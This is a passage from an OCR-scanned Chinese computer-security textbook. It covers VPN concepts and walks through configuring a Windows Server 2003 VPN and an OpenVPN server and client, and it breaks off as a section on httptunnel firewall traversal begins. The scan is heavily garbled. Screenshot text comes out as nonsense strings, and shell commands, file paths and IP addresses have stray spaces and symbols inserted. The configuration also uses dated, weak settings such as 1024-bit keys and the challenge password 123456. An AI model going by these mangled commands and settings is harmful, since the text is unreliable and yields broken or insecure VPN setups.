册 OLE 对 象 或 控件 的 命令 ,“/u” 是 反 注 册 参 数 ,“/s” 是 安静 模式 参数 ,“/i” 是 安装 参数 。 

(9) 定时 备份 。 定 时 备份 硬盘 上 的 重要 文件 .可 以 用 ghost 备份 分 区 ,可 以 用 diskgen 
备份 分 区 表 。 

(10) 不 要 运行 来 路 不 明 的 软件 ,不 要 打开 来 路 不 明 的 邮件 。 


514 VPN 技 术 


本 节 首 先 简要 介绍 VPN 的 基本 概念 ,然后 通过 实例 讲述 VPN 技术 在 Windows 环境 
和 Linux 环境 中 的 应 用 。 


5.14.1 VPN 技术 概述 


1. 虚拟 专用 网 (Virtual Private Network. VPN) H Æ X 

VPN 被 定义 为 通过 一 个 公用 网 络 ( 公 用 网 络 包 括 IP 网 络 、 帧 中 继 网 络 和 ATM 网 络 ， 
通常 是 指 互联 网 ) 建 立 一 个 临时 的 、 安 全 的 连接 ,是 一 条 穿 过 公用 网 络 的 安全 、 稳 定 的 通道 。 
在 VPN 中 ,任意 两 个 结 点 之 间 的 连接 并 没有 传统 专用 网 络 所 需 的 端 到 端的 物理 链 路 ,而 是 
利用 某 种 公用 网 络 的 资源 动态 组 成 的 。 虚 拟 是 指 用户 不 再 需要 拥有 实际 的 长 途 数据 线路 ， 
而 是 使 用 Internet 公众 数据 网 络 的 长 途 数 据 线路 。 专 用 网 络 是 指 用 户 可 以 为 自己 制定 一 个 
最 符合 自己 需求 的 网 络 。VPN 不 是 真 的 专用 网 络 ,但 却 能 够 实现 专用 网 络 的 功能 。 

VPN 是 对 企业 内 部 网 的 扩展 ,可 以 帮助 远程 用 户 、 公 司 分 支 机 构 、 商 业 伙 伴 及 供应 商 同 
公司 的 内 部 网 建立 可 信和 的 安全 连接 ,并 保证 数据 的 安全 传输 ; VPN 可 用 于 不 断 增长 的 移动 
用 户 的 全 球 互联 网 接 入 ,以 实现 安全 连接 。 

一 般 情况 下 VPN 有 PPTP VPN,IPSEC VPN fil L2TP VPN 3 种 ,其 中 PPTP VPN 最 
简便 ,IPSEC VPN 最 通用 ,各 个 平台 都 支持 ,L2TP VPN 最 安全 。 

2. VPN 的 基本 功能 

VPN 的 功能 至 少 要 包含 以 下 几 个 方面 。 

CD 加 密 数据 : 保证 通过 公用 网 络 传输 的 信息 即使 被 其 他 人 截获 也 不 会 汇 露 。 

(2) 信息 验证 和 身份 识别 : 保证 信息 的 完整 性 、 合 理性 ,并 能 鉴别 用 户 的 身份 。 

(3) 提供 访问 控制 : 不 同 的 用 户 有 不 同 的 访问 权限 。 

(4) 地 址 管理 : 能 够 为 用 户 分 配 专用 网 络 上 的 地 址 并 确保 地 址 的 安全 性 。 

(5) 密 钥 管理 : 能 够 生成 并 更 新 客户 端 和 服务 器 的 加 密 密 钥 。 

(6) 多 协议 支持 : 能 够 支持 公共 网 络 上 普遍 使 用 的 基本 协议 (包括 IP、IPX 等 ) 。 

3. VPN 的 优点 

CD 降低 费用 : 远程 用 户 可 以 在 当地 接 入 Internet. DA Internet 作为 通道 与 企业 内 部 
的 专用 网 络 相 连 , 可 以 大 幅 降 低 通信 费用 .另外 企业 可 以 节省 购买 和 维护 通信 设备 的 
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费用 。 

(2) 安全 性 增强 : VPN 使 用 通道 协议 .身份 验证 和 数据 加 密 3 个 方面 的 技术 保证 通信 
的 安全 性 。 客 户 机 向 VPN 服务 器 发 出 请 求 .VPN 服务 器 响应 请 求 并 向 客户 机 发 出 身份 质 
询 ,客户 机 将 加 密 的 响应 信息 发 送 到 VPN 服务 器 端 ,VPN 服务 器 根据 用 户 数 据 库 检查 该 响 
应 。 如 果 账 户 有 效 ,VPN 服务 器 将 检查 该 用 户 是 否 具有 远程 访问 的 权限 。 如 果 拥 有 远程 访 
问 的 权限 ,VPN 服务 器 接受 此 连接 。 在 身份 验证 过 程 中 产生 的 客户 机 和 服务 器 公有 密 钥 将 
用 来 对 数据 进行 加 密 。 

(3) 支持 最 常用 的 网 络 协议 : 在 基于 IP、IPX 和 NetBUI 协议 的 网 络 中 的 客户 机 都 能 够 
很 容易 地 使 用 VPN。 

CD 有 利于 IP 地 址 安全 : VPN 是 加 密 的 ,VPN 数据 在 Internet 中 传输 时 ,Internet 上 
的 用 户 只 看 到 公共 的 IP 地 址 ,看 不 到 数据 包 内 包含 的 专用 网 络 地 址 。 


5.14.2 实例 : 配置 基于 Windows 平台 的 VPN 


1. 在 Windows Server 2003 SP2 上 配置 VPN 服务 器 的 过 程 

第 1 步 : 打开 “路 由 和 远程 访问 服务 器 安装 向 导 ” 窗 口 。 依 次 进入 “开始 ”一 “程序 ”一 
“管理 工具 ”一 “路 由 和 远程 访问 ”, 打 开 “ 路 由 和 远程 访问 ”控制 台 ,如 图 5-103 所 示 。 右 击 左 
边框 架 中 的 “ZTG2003( 本 地 )”(ZTG2003 为 服务 器 名 ), 选 择 “ 配 置 并 启用 路 由 和 远程 访 
问 ”, 打 开 “ 路 由 和 远程 访问 服务 器 安装 向 导 ” 对 话 框 ,如 图 5-104 所 示 。 


路 由 和 远程 沪 问 服务 回 安 装 向 导 


配置 ER 
您 可 以 局 用 下 列 服 务 的 任意 姐 合 ,或 者 修 可 以 自 定义 此 服务 器 。 ge 
C EURUUE GRE VERO QU) 
PFR EPRIN Rar omn Internet ERRES 
C 网 络 地 址 转 执 0IAT) QD 
XM MEO EV 帮助 0 JGTABEE PRISE IRE IF 地 址 连接 到 Internete 
e» | c em C ISO PRESS EYES EP NAT 


v 
Internet 连接 到 此 服务 器 ， 本 地 客户 端 使 用 一 个 单一 的 
和 
p C 两 个 专用 网络 之 间 的 安全 连接 G) 
将 此 网 络 连 接 到 一 个 远程 网络， 例如 一 个 分 支 办 公 室 。 


和 由; EI 
LE D 
2162003 pum 


配置 并 局 用 路 由 和 远程 访问 O 
SEHE D. C 自 定 义 配 置信) 
选择 在 路 由 和 远程 访问 中 的 任何 可 用 功能 的 组 合 。 


| xm | 


图 5-103 “路 由 和 远程 访问 "控制 台 图 5-104 “路 由 和 远程 访问 服务 器 安装 向 导 ” 对 话 框 


第 2 步 : 选择 网 络 接口 。 在 图 5-104 中 ,选择 “远程 访问 (拨号 或 VPN)”, 然 后 单 击 “ 下 
一 步 ” 按 钮 ,弹出 如 图 5-105 所 示 的 对 话 框 ,选择 VPN. 然 后 单 击 “ 下 一 步 ” 按 钮 ,弹出 如 
图 5-106 所 示 的 对 话 框 。 选 择 网 络 接口 (本 实验 选择 192. 168. 10. D ,然后 单 击 “ 下 一 步 ” 按 
钮 ,弹出 如 图 5-107 所 示 的 对 话 框 。 

第 3 步 : 指定 IP 地 址 。 在 图 5-107 中 :要 为 远程 VPN 客户 端 指 定 IP 地 址 。 默 认 选 项 
为 “自动 ”, 由 于 本 机 没有 配置 DHCP 服务 器 ,因此 需要 改选 为 “来 自 一 个 指定 的 地 址 范围 ”， 
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m 连接 
it va SPRER, ER IH FISERCUERSI 


[ 
DLink DPE-SSOTX © 210.43 12.5 


图 5-105 远程 访问 图 5-106 VPN 连接 


rr ARE 
ERTUUSREOSEHEE PRRI IP 地 址 的 方法 。 


792.168. 10 . 100 
192.168. 10 . 20d 


5-107 指定 IP 地 址 5-108 指定 IP 地 址 范围 


然后 单 击 * 下 一 步 按 钮 ,弹出 如 图 5-108 所 示 的 对 话 框 。 在 “新 建 地 址 范围 ”窗口 中 ,可 以 为 
VPN 客户 机 指定 所 分 配 的 IP 地 址 范围 。 比 如 分 配 的 IP 地 址 范围 为 192. 168. 10. 100 — 
192. 168. 10. 200, 然 后 单 击 “ 确 定 ” 按 钮 ,弹出 如 图 5-109 所 示 的 对 话 框 。 
此 时 需 注意 ,不 可 以 将 本 身 的 IP 地址 (192. 168. 10. 1) 包 含 进去 。 
注意 : 这 些 IP 地 址 将 分 配给 VPN 服务 器 和 VPN 客户 机 。 为 了 确保 连接 后 的 VPN 网 
络 能 同 VPN 服务 器 原 有 局 域 网 正常 通信 ,它们 必须 同 VPN 服务 器 的 IP 地 址 处 在 同一 个 
网 段 中 。 即 假设 VPN 服务 器 IP 地 址 为 192. 168. 0. 1, 则 此 范围 中 的 IP 地 址 均 应 该 以 
192.168.0 开头 。 单 击 “ 确 定 ” 按 钮 ,然后 单 击 “ 下 一 步 " 按 钮 继续 。 
第 4 步 : 结束 VPN 服务 器 的 配置 。 在 图 5-109 中 ,在 “管理 多 个 远程 访问 服务 器 ”一 步 
用 于 设置 集中 管理 多 个 VPN 服务 器 。 默 认 选 项 为 “ 否 , 使 用 路 由 和 远程 访问 来 对 连接 请 求 
进行 身份 验证 ”, 不 用 修改 ,直接 单 击 “ 下 一 步 ” 按 钮 。 弹 出 如 图 5-110 所 示 的 对 话 框 ,直接 单 
“完成 ”按钮 。 此 时 屏幕 上 将 出 现 一 个 名 为 “正在 启动 路 由 和 远程 访问 服务 ”的 小 窗口 ,过 
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一 会 儿 将 自动 返回 “路 由 和 远程 访问 ”控制 台 , 弹 出 如 图 5-111 所 示 的 对 话 框 , 即 结束 了 
VPN 服务 器 的 配置 工作 。 


SrIREAHESN. 正在 完成 路 由 和 远程 访问 服务 器 安装 向 导 
有 
SU EF 


rs 您 已 成 功 完成 路 由 和 运程 访问 最 各 器 安装 向导 . 


ENARE ESE ips 
Eno. ri d 服务 器 ， 您 可 以 设置 此 职务 器 格 身份 验证 请 


您 想 设置 此 职务 器 与 RADIUS 服务 器 一 起 工作 吗 ? 
Dno 
C 是 ,设置 此 服务 器 与 ronis 服务 器 一 起 工作 中 
ka » dB ciat 
f EN VERE. ARXHPKPI Bus. us 
tC 


请 单 击 “ 完 成 ”来 关闭 此 商 导 . 


«x-se[r-sw»] mm fx-se[ x& ] mx» 
图 5-109 管理 多 个 远程 访问 服务 器 图 5-110 FER VPN 服务 器 的 配置 
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图 5-111 “路 由 和 远程 访问 "控制 台 


说 明 : 此 时 “路 由 和 远程 访问 ”控制 台 ( 如 图 5-111 所 示 ) 中 的 “路 由 和 远程 访问 ”服务 已 
经 处 于 “已 启动 ”状态 了 ; 而 在 “网 络 和 拨号 连接 ”窗口 中 也 会 多 出 一 个 “ 传 入 的 连接 ”图 标 。 

第 5 步 : 赋予 用 户 拨 入 权限 。 默 认 情 况 下 ,包括 Administrator 用 户 在 内 的 所 有 用 户 均 
被 拒绝 氢 入 VPN 服务 器 上 ,因此 需要 为 相应 用 户 赋予 氢 入 权限 。 下 面 以 Administrator 用 
户 为 例 说 明 。 

a 在 “我 的 计算 机 ”处 右 击 , 选 择 “ 管 理 ” 命 令 , 打 开 “ 计 算 机 管理 ”控制 台 5-112 
所 示 。 

© 在 左边 框架 中 依次 展开 “本 地 用 户 和 组 ”~ “用 户 ”, 在 右边 框架 中 双击 
Administrator, łJ JF“ Administrator 属性 ”窗口 ,弹出 如 图 5-113 所 示 的 对 话 框 。 

© 转 到 * 拨 入 ?选项 卡 ,在 “远程 访问 权限 ( 拨 入 或 VPNO ?选项 组 下 默认 选项 为 “通过 远 
程 访问 策略 控制 访问 ”, 改 选 为 “允许 访问 ”, 然 后 单 击 “ 确 定 ” 按 钮 返回 “计算 机 管理 ”控制 台 ， 
IR f WE. Administrator 用 户 拨 入 权限 的 工作 。 

2. VPN 客户 机 (Windows XP) 的 配置 过 程 

第 1 步 : 打开 * 网 络 连接 ”窗口 。 在 “网 上 邻居 ”处 右 击 ,选择 “属性 ”命令 。 打 开 “ 网 络 连 
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图 5-112 “计算 机 管理 ”控制 台 


接 ” 窗 口 , 如 图 5-114 所 示 。 单 击 “ 创 建 一 个 新 的 连接 ”, 在 弹出 的 窗口 中 单 击 “ 下 一 步 ” 按 钮 ， 
弹出 如 图 5-115 所 示 的 对 话 框 。 选 择 * 连 接 到 我 的 工作 场所 的 网 络 ”, 单 击 “ 下 一 步 ” 按 钮 , 弹 


出 如 图 5-116 所 示 的 对 话 框 。 选 择 “ 虚 拟 
图 5-117 所 示 的 对 话 框 。 


专用 网 络 连接 ”, 单 击 “ 下 一 步 ” 按 钮 ,弹出 如 


第 2 步 : 输入 公司 名 。 在 图 5-117 中 ,输入 公司 名 , 单 击 “下 一 步 ” 按 钮 ,弹出 如 图 5-118 
所 示 的 对 话 框 ,在 “公用 网 络 ” 一 步 可 以 选择 是 否 在 VPN 连接 前 自动 拨号 。 默 认 选 项 为 “ 自 


动 氢 此 初始 连接 ”, 需 要 改选 为 “不 拨 初 始 连接 ”, 然 后 单 击 * 下 一 步 按 钮 ,弹出 如 图 5-119 所 
示 的 对 话 框 。 
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d pm (xe Gu 


图 5-114 “网 络 连 接 ” 对 话 框 


同 络 连 接 < 
OTHER 
Omsimo) 


IRURE UTR, RESER Oso it 


EC RI 


s L 
PACMAN Internet 连接 到 问 洛 - 


Æ 5-116 网络 连 接 
201 


pense 第 2 版 ) 


连接 名 RE 公用 同 络 < 
指定 连接 到 履 的 工作 场所 的 连接 名 称 - Finders 可 以 先 确认 公用 辣 络 是 否 已 接 好 . DA 
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CENY 
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图 5-117 连接 名 图 5-118 公用 网 络 


A aienea? 正在 完成 新 建 入 按 向 导 


答 入 修正 连 援 的 计算 机 的 主机 名 惑 IT Hd. LCHOSTSROBETADSIERUEOS 4E 


ENER IP 地 址 ONO, microsoft. con WÈ 157.540. 1) Q): 
132. 168. 10.1 


vwin2003 
* 与 此 计算 机 上 的 所 有 用 户 共享 


JUSIRREAEA, “PEMER” LAR. 
CERIS AUR EE 0— 131A RON Sf 


WOBRIUSIROLEIAIS , Mdb “AR. 


图 5-119 VPN 服务 器 选择 图 5-120 ”完成 VPN 服务 器 设置 


第 3 步 : 输入 VPN 服务 器 的 IP 地 址 。 在 图 5-119 中 ,需要 提供 VPN 服务 器 的 主机 名 
或 IP 地 址 。 在 文本 框 中 输入 VPN 服务 器 的 IP 地 址 ,本 实验 VPN 服务 器 IP 地 址 是 
192. 168. 10. 1, 然 后 单 击 “ 下 一 步 ” 按 钮 ,弹出 如 图 5-120 所 示 的 对 话 框 ,可 以 勾 选 “在 我 的 桌 
面 上 添加 一 个 到 此 连接 的 快捷 方式 ” 复 选 框 ,然后 单 击 “ 完 成 ”按钮 。 之 后 会 自动 弹出 “连接 
win2003” 对 话 框 ,如 图 5-121 所 示 。 输 入 用 户 名 和 密码 ,根据 需要 勾 选 “为 下 面 用 户 保存 用 
户 名 和 密码 ” 复 选 框 ,然后 单 击 “ 连 接 ” 按 钮 。 

注意 : 此 处 输入 的 用 户 名 应 为 VPN 服务 器 上 已 经 建立 好 ,并 设置 了 具有 拨 入 服务 器 权 
限 的 用 户 和 密码 。 

连接 成 功 之 后 可 以 看 到 ,双方 的 任务 栏 右 侧 均 会 出 现 两 个 拨号 网 络 成 功 运行 的 图 标 ,其 
中 一 个 是 到 Internet 的 连接 , 另 一 个 则 是 VPN 的 连接 。 

注意 : 当 双 方 建立 好 了 通过 Internet 的 VPN 连接 后 , 即 相 当 于 又 在 Internet 上 建立 好 
了 一 个 双方 专用 的 虚拟 通道 ,而 通过 此 通道 ,双方 可 以 在 网 上 邻居 中 进行 互 访 , 即 相当 于 又 
组 成 了 一 个 局 域 网 络 ,这 个 网 络 是 双方 专用 的 ,而 且 具 有 良好 的 保密 性 能 。VPN 建立 成 功 
之 后 ,双方 便 可 以 通过 IP 地 址 或 “网 上 邻居 ”来 达到 互 访 的 目的 ,当然 也 就 可 以 使 用 对 方 所 
共享 出 来 的 软 硬 件 资源 了 。 
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34 VPN 网 络 建立 成 功 之 后 ,VPN 客户 机 和 VPN 服务 器 ,或 者 VPN 客户 机 和 VPN 服 
务 器 所 在 的 局 域 网 中 的 其 他 计算 机 ,进行 共享 资源 的 互 访 的 方法 是 ,在 资源 管理 器 窗口 的 地 
址 栏 输入 “\\ 对 方 IP 地 址 ”来 访问 对 方 共享 出 的 软 硬 件 资源 。 

如 果 VPN 客户 机 不 能 访问 互联 网 ,是 因为 VPN 客户 机 使 用 了 VPN 服务 器 定义 的 网 
关 , 解 决 方法 是 禁止 VPN 客户 机 使 用 VPN 服务 器 上 的 默认 网 关 。 具 体操 作 方 法 : 对 于 
Windows XP 客户 机 ,在 “网 络 和 拨号 连接 ”窗口 中 , 先 选中 相应 的 连接 名 ,比如 为 win2003， 
右 击 ,选择 “属性 ”打开 “win2003 属性 ”窗口 ,如 图 5-122 所 示 。 再 转 到 “网 络 ” 选 项 卡 ,双击 
列表 中 的 “Internet 协议 (TCP/IP)”, 打 开 “Internet 协议 (TCP/IP) 属 性 ”窗口 。 然 后 单 击 
“高 级 "按钮 ,进入 “高 级 TCP/IP 设置 "窗口 的 “常规 ”选项 卡 ,取消 选中 “在 远程 网 络 上 使 用 
默认 网 关 ? 选 项 。 


人 vin2003 Ett 


xu 
APUNAAN. ES 


[mto ] Cx JL x jJ 


图 5-121 “连接 win2003” 对 话 框 图 5-122  win2003 网 络 连接 属性 


5.14.3 实例 : 配置 基于 Linux 平台 的 VPN 


1. 实验 环境 

一 台 安 装 Linux 的 计算 机 ,作为 VPN 服务 器 (图 5-123 中 的 VPN 服务 器 ); 一 台 安 装 
Windows 的 计算 机 ,作为 VPN 客户 端 ( 图 5-123 中 的 外 地 员工 ) 。 

该 实验 达到 的 效果 类 似 于 如 图 5-123 所 示 的 VPN 环境 。 


192.168.10.1 192.168.10.8 


外 地 员工 (Linux) VPN 服 务 器 123.5.0.0/16 


图 5-123 实验 环境 


对 图 5-123 的 说 明 如 下 。 
(1) 外 地 员工 端 通过 Internet 网 络 连接 到 公司 网 络 ( 模 拟 成 192. 168. 10. 0 网 段 ) ,并 建 
Xr. 10. 10.0.0 的 VPN 通道 。 
(2) 公司 内 部 网 络 为 123. 5. 0. 0 网 段 ,假设 只 有 一 台 主 机 。 
203 


(3) 目标 是 客户 端 和 后 台 主 机 可 以 双向 互通 。 

2. 在 Linux 上 配置 VPN 服务 器 的 过 程 

第 1 步 : 下 载 并 且 安 装 lzo M openvpn, fE http://www. oberhumer. com/opensource/ 
lzo/ download/ 上 下 载 lzo-2. 02; 在 http://openvpn. net/download. html 上 下 载 openvpn- 
2.0.9, 

安装 lzo: 

[root(2localhost lzo- 2.02]# ./configure 


[root@ localhost lzo- 2.02] £ make 
[root@ localhost lzo - 2.02] & make install 


安装 openvpn: 


[root@ localhost openvpn- 2.0.9] & ./configure 
[root(2localhost openvpn- 2.0.9] # make 
[root(2localhost openvpn- 2.0.9] £ make install 


^8 23b. 复制 创建 CA 证 书 的 easy-rsa。 
# cp -ra /usr/share/doc/openvpn - 2. 0. 9/easy - rsa /etc/openvpn/ 
第 33p. 复制 示例 配置 文件 。 


# cd /etc/openvpn/ 
# cp /usr/share/doc/openvpn - 2.0.9/sample- config - files/server.conf /etc/openvpn/ 


第 4 步 : 修改 证 书 变 量 。 


# cd easy- rsa 
# vim vars 


根据 实际 情况 ,修改 下 面 的 变量 : 


export KEY_COUNTRY = CN 

export KEY_PROVINCE = HN 

export KEY_CITY = XX 

export KEY ORG = "TEST" 

export KEY EMAIL = "jsjoscpu(4163. com" 

注意 : 这 些 变量 在 后 面 会 用 到 ,如 果 修 改 , 则 必须 重建 所 有 的 PKI 

第 5 步 : 初始 化 PKI, 如 图 5-124 Bron 。 

依次 执行 并 source vars、 井 . /clean-all #I #. /build-ca 命令 。 

注意 : 一 旦 运行 clean-all, 将 删除 keys 下 的 所 有 证 书 。 

Common Name 可 以 自己 定义 ,这 里 用 ZTG-OPENVPN, 

第 6 步 : 创建 服务 器 的 证 书 和 密 钥 , 如 图 5-125 所 示 。 执 行 #. /build-key-server server 
命令 ,Common Name 必须 填写 server, 其 余 选 项 用 默认 值 即 可 。 

第 7 步 : 创建 客户 端的 证 书 和 密 钥 ,如 图 5-126 和 图 5-127 所 示 。 执 行 #. /build-key 
clientl 命令 ,Common Name 对 应 填写 clientl ,其 余 用 默认 值 即 可 。 

如 果 创 建 第 二 个 客户 端 , 则 执行 站./Vbuild-key client2 命令 ,Common Name 对 应 填写 
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rootGlocalhost:/etc/openvpn/easy-rsa 


[rootelocalhost easy-rsa]# source vars 
NOTE: when you run ./clean-all, I will be doing a rm —rf on /etc/openvpn/easy-rsa/keys 
[rooteélocalhost easy-rsa]# ./clean-all 
[rootelocalhost easy-rsa]# ./build-ca 


Generating a 1024 bit 


wr 


RSA private key 


ting new private key to 'ca.key' 


You are about to be asked to enter information that will be incorporated 


into your certificate 
What you are about to 
There are quite a few 
For some fields there 
If you enter '.', the 


request. 

enter is what is called a Distinguished Name or a DN. 
fields but you can leave some blank 

will be a default value, 

field will be left blank. 


计算 机 网 络 安全 技术 


JUK 


Country Name (2 letter code) [CN]: 

State or Province Name (full name) [HN]: 

Locality Name (eg, city) [XX]: 

rganization Name (eg, company) [TEST]: 

Organizational Unit Name (eg, section) []: 

Common Name (eg, your name or your server's hostname) []:ZTG-OPENVPN 
Email Address [jsjoscpuo163.com]: 

[rootelocalhost easy-rsa]l& 


图 5-124 初始 化 PKI 


rootGlocalhost:/etc/openvpn/easy-rsa 


[rootelocalhost easy-rsa]* ./build-key-server server 
Generating a 1024 bit RSA private key 

eee 
eee 


writing new private key to 'server.key" 


You are about to be asked to enter information that will be incorporated 
into your certificate request. 

What you are about to enter is what is called a Distinguished Name or a DN. 
There are quite a few fields but you can leave some blank 

For some fields there will be a default value, 

If you enter '.', the field will be left blank. 


Country Name (2 letter code) [CN]: 
State or Province Name (full name) [HN]: 
Locality Name (eg, city) [XX]: 
Organization Name (eg, company) [TEST]: 
Organizational Unit Name (eg, section) []: z 
Common Name (eg, your name or your server's hostname) []:server 
Email Address [jsjoscpue163.com]: 


图 5-125 创建 服务 器 的 证 书 和 密 钥 


client2。clientl 和 client2 是 今后 识别 客户 端的 标识 。 

第 8 步 : 创建 Diffie Hellman 参数 ,如 图 5-128 所 示 。 执 行 井 ./build-dh 命令 。Diffie 
Hellman 用 于 增强 安全 性 ,在 Open VPN 是 必需 的 ,创建 过 程 所 用 时 间 比 较 长 ,时 间 长 短 由 
vars 文件 中 的 KEY_SIZE 决定 。 

第 9 步 : 修改 配置 文件 server. conf ,内 容 如 下 。 

# 井 号 和 ; 号 开头 的 是 注释 

# 设置 监听 IP 
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rootGlocalhost:/etc/openvpn/easy-rsa 2ER 


[root@localhost easy-rsa]# ./build-key clientl 
Generating a 1024 bit RSA private key 

HH 

natt 

writing new private key to 'clientl.key" 


You are about to be asked to enter information that will be incorporated 
into your certificate request. 

What you are about to enter is what is called a Distinguished Name or a DN. 
There are quite a few fields but you can leave some blank 

For some fields there will be a default value, 

If you enter '.', the field will be left blank. 


Country Name (2 letter code) [CN]: 

State or Province Name (full name) [HN]: 

Locality Name (eg, city) [XX]: 

Organization Name (eg, company) [TEST]: 

Organizational Unit Name (eg, section) []: 

Common Name (eg, your name or your server's hostname) []:clientl 
Email Address [jsjoscpue163.com 


图 5-126 创建 客户 端的 证 书 和 密 钥 


rootGlocalhost:/etc/openvpn/easy-rsa 


Please enter the following 'extra' attributes 

to be sent with your certificate request 

A challenge password []:123456 

An optional company name []:jsj 

Using configuration from /etc/openvpn/easy-rsa/openssl.cnf 
Check that the request matches the signature 

Signature ok 

The Subject's Distinguished Name is as follows 

countryName :PRINTABLE : ' CN" 

stateOrProvinceName ^ :PRINTABLE: "HN" 


localityName :PRINTABLE: ' XX" 
organizationName 1PRINTABLI TEST' 
commonName PRINTABLE: ' server ' 


emailAddress ABSTRING: ‘jsjoscpu@163 .com' 
Certificate is to be certified until Mar 15 08:36:38 2018 GMT (3650 days) 
Sign the certificate? [y/n]:y 


1 out of 1 certificate requests certified, commit? [y/nly 
Write out database with 1 new entries 

Data Base Updated 

[rootelocalhost easy-rsa]* [i 


图 5-127 创建 客户 端的 证 书 和 密 钥 


local 192.168.10.8 
# 设置 监听 端口 ,必须 要 对 应 的 在 防火 墙 里 面 打开 


port 1234 

# 设置 用 TCP 还 是 UDP 协议 

proto udp 

# 设置 创建 tun 的 路 由 IP 通 道 , 路 由 IP 容易 控制 

dev tun 

oxkHideGgE 4i iE SSL/TLS root certificate (ca) 


* certificate(cert), and private key (key) 
ca ./easy - rsa/keys/ca. crt 

cert ./easy - rsa/keys/server.crt 

key ./easy - rsa/keys/server.key 

# 指定 Diffie hellman parameters 
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rootGlocalhost:/etc/openvpn/easy-rsa 
[rootelocalhost easy-rsa]* ./build-dh 

Generating DH parameters, 1024 bit long safe prime, generator 2 
This is going to take a long time 


st easy-rsa]* 


图 5-128 创建 Diffie Hellman 参数 


dh . /easy - rsa/keys/dh1024. pem 

# 配置 VPN 使 用 的 网 段 , OpenVPN 会 自动 提供 基于 该 网 段 的 DHCP 服务 ,但 不 能 和 任何 一 方 的 局 域 网 
段 重复 ,保证 唯一 

server 10.10.0.0 255.255.255.0 

# 维持 一 个 客户 端 和 virtual IP 的 对 应 表 , 以 方便 客户 端 重新 连接 可 以 获得 同样 的 IP 
ifconfig- pool- persist ipp.txt 

# 为 客户 端 创建 对 应 的 路 由 ,以 令 其 通达 公司 网 内 部 服务 器 .但 记 住 ,公司 网 内 部 服务 器 也 需要 有 可 
用 路 由 返回 到 客户 端 

push "route 123.5.0.0 255.255.0.0" 

# 默认 客户 端 之 间 是 不 能 直接 通信 的 ,除非 把 下 面 的 语句 注释 掉 

client- to- client 

# 设置 服务 端 检测 的 间隔 和 超时 时 间 

keepalive 10 120 

# 使 用 1zo 压缩 的 通信 ,服务 端 和 客户 端 都 必须 配置 

comp - lzo 

# The persist options will try to avoidaccessing certain resources on restart 

* that may no longer be accessible because of the privilege downgrade 
persist - key 

persist - tun 

# 输出 短 日 志 , 每 分 钟 刷新 一 次 ,以 显示 当前 的 客户 端 

status /var/log/openvpn/openvpn - status. log 


第 10 3b : 启动 openvpn. 

TA fT[ root? localhost openvpn] # openvpn --config server. conf 命令 ,如 图 5-129 所 示 。 

3. 在 Windows Server 2003 SP2 上 安装 客户 端的 过 程 

第 1 步 : 安装 OpenVPN GUI for Windows。 在 http://www. openvpn. se/download. 
html 中 下 载 OpenVPN GUI for Windows, 然 后 安装 。 

第 2 步 : 复制 文件 。 将 VPN 服务 器 上 的 ca. crt、clientl. crt 和 clientl. key 三 个 文件 复 
制 到 客户 端的 C:\Program Files\OpenVPN\config 文件 夹 中 。 

第 3 Jb. 编辑 client. ovpn 文件 。 编 辑 C:\Program Files\OpenVPN\config\client. 
ovpn 文件 ,内 容 如 图 5-130 所 示 。 
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root@localhost:/etc/openvpn 
[root@localhost openvpn]# openvpn 一 config server.conf 
Mon Mar 17 2008 OpenVPN 2.0.9 i686-pc-linux [SSL] [Lzo] [EPOL 


] buiit on Mar 17 2008 


Mon Mar 17 2008 MANAGEMENT: TCP Socket listening on 127.0.0.1:7505 

Mon Mar 17 2008 Note: cannot open /var/log/openvpn/openvpn-status.log for WRITE 
Mon Mar 17 2008 Diffie-Hellman initialized with 1024 bit key 

Mon Mar 17 2008 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:O ET:O EL:0 ] 

Mon Mar 17 2008 TUN/TAP device tun0 opened 

Mon Mar 17 2008 /sbin/ifconfig tun0 10.10.0.1 pointopoint 10.10.0.2 mtu 1500 


008 /sbin/route add -net 10.10.0.0 netmask 2 
2008 Data Channel MTU parms [ L:1542 D:1450 EF: 


Mon Mar 17 
Mon Mar 17 


Mon Mar 17 2008 UDPv4 link local (bound): 192.168.10.8:1234 
Mon Mar 17 2008 UDPv4 link remote: [undef] 

Mon Mar 17 2008 MULTI: multi init called, r-256 v-256 

Mon Mar 17 2008 IFCONFIG POOL: base-10.10.0.4 size-62 

Mon Mar 17 2008 IFCONFIG POOL LIST 

Mon Mar 17 2008 client1,10.10.0.4 


Mon Mar 17 2008 Initialization Sequence Completed - 


图 5-129 启动 openVPN 

第 4 步 : 建立 VPN 通道 。 如 图 5-131 所 示 , 右 击 圆 圈 中 的 图 标 , 然 后 选择 Connect, 弹 

出 如 图 5-132 所 示 的 对 话 框 ,输入 用 户 名 和 密码, 单 击 OK 按钮 ,如 果 不 出 意外 ,将 建 
VPN 通道 ,图 5-133 中 圆圈 中 的 图 标 由 红色 变 为 绿色 。 


Disconnect 
Show Status 


Vier Log 
Edit Config 
Change Password 


EZEC Fr 


cert clientl.crt 
key clientl.key 
Comp-lzo 


About 


cCUTLULILET 
5-130 ”编辑 client. ovpn 文件 图 5-131 建立 VPN 通道 


Proxy Sett[OpenVPN GUI 
[Connected to: client 
Connected since: Mar 17, 18:46 
Assigned IP: 10.10.0.6 


图 5-132 输入 用 户 名 和 密码 图 5-133 图 标 颜色 


第 5 步 : 查看 VPN 客户 端 IP 地址 。 如 图 5-134 所 示 , 在 VPN 客户 端 ,使 用 ipconfig. 
可 以 看 到 VPN 通道 已 经 建立 ,获得 的 IP 地 址 是 10. 10. 0. 6。 
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图 5-134 查看 VPN 客户 端 IP 地 址 
第 6 步 : 查看 VPN 服务 器 端 IP 地 址 。 如 图 5-135 所 示 , 在 VPN 服务 器 端 ,使 用 
ifconfig ,可 以 看 到 VPN 通道 已 经 建立 ,获得 的 IP 地 址 是 10. 10. 0. 1 。 
第 7 步 : 测试 。 


rootGlocalhost:— 


Link encap:UNSPEC HWaddr 00-00-00—00-00-00 


inet addr:10.10.0.1 P-t-P 


TX packets:3 errors:0 dropped:0 overruns:0 carrier:O 
collisions:0 txqueuelen:100 
RX bytes:0 (0.0 b) TX bytes:252 (252.0 b) 


图 5-135 f VPN 服务 器 端 IP 地 址 


515 实例 : htptunnel 技术 


1. httptunnel 技术 

任何 防火 墙 都 不 可 能 把 所 有 的 端口 都 封闭 ,至 少 要 开放 一 个 端口 和 服务 (比如 80 端口 ， 
HTTP) ,只 要 开放 了 端口 和 服务 ,就 有 渗透 的 可 能 。 

如 图 5-136 所 示 ,防火 墙 只 允许 外 网 通过 80 端口 访问 内 网 ,如 果 内 网 一 台 计算 机 的 
